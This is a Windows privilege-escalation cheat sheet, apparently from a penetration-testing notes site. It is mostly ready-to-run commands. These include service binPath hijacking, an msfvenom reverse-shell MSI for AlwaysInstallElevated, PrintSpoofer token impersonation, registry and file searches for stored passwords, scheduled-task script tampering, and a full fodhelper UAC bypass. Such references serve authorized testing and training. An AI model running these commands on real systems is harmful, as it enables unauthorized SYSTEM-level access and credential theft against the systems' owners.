Skip to main content

Windows Privilege Escalation

Initial Enumeration

whoami /all                       # User, groups, privileges
systeminfo                        # OS, patches, architecture
net user                          # Local users
net localgroup administrators     # Local admins
wmic qfe get Caption,Description  # Installed patches
wmic logicaldisk get caption      # Drives

Automated Tools

WinPEAS    → Most comprehensive enum script
Seatbelt   → C# security checks
PowerUp    → PowerShell privesc checks
JAWS       → PowerShell enum script
# Run WinPEAS
.\winPEAS.exe

# Run PowerUp
. .\PowerUp.ps1
Invoke-AllChecks

Unquoted Service Paths

# Find vulnerable services
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

# If path: C:\Program Files\My App\service.exe
# Try placing: C:\Program.exe or C:\Program Files\My.exe

Weak Service Permissions

# Check service permissions
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Everyone" *

# If writable, change binary path
sc config VulnService binPath= "C:\temp\shell.exe"
sc start VulnService

AlwaysInstallElevated

# Check registry keys
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If both = 1, create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi -o evil.msi
msiexec /quiet /qn /i evil.msi

Token Impersonation

Requires: SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege

Tools:
- JuicyPotato   (older Windows)
- PrintSpoofer  (Windows 10/Server 2019)
- RoguePotato
- GodPotato
# Check privileges
whoami /priv

# PrintSpoofer
.\PrintSpoofer.exe -i -c cmd

DLL Hijacking

1. Find a process running as SYSTEM that loads a missing DLL
2. Place malicious DLL in a writable directory in the search order
3. Process loads your DLL → code runs as SYSTEM

DLL Search Order:
1. Application directory
2. System32
3. System directory
4. Windows directory
5. Current directory
6. PATH directories

Stored Credentials

# Saved credentials
cmdkey /list
runas /savecred /user:admin cmd.exe

# Config files
dir /s *pass* == *cred* == *vnc* == *.config
findstr /si password *.xml *.ini *.txt

# Registry credentials
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Unattend files
C:\Windows\Panther\Unattend.xml
C:\Windows\system32\sysprep\sysprep.xml

Scheduled Tasks

schtasks /query /fo LIST /v       # List all tasks
schtasks /query /fo LIST /v | findstr "Task To Run"

# If task script is writable:
echo C:\temp\shell.exe >> C:\Scripts\task.bat

UAC Bypass

Common techniques:

  • fodhelper.exe registry hijack
  • eventvwr.exe registry hijack
  • sdclt.exe registry hijack
# fodhelper bypass
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -Value "" -Force
Set-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name "(default)" -Value "C:\temp\shell.exe"
Start-Process fodhelper.exe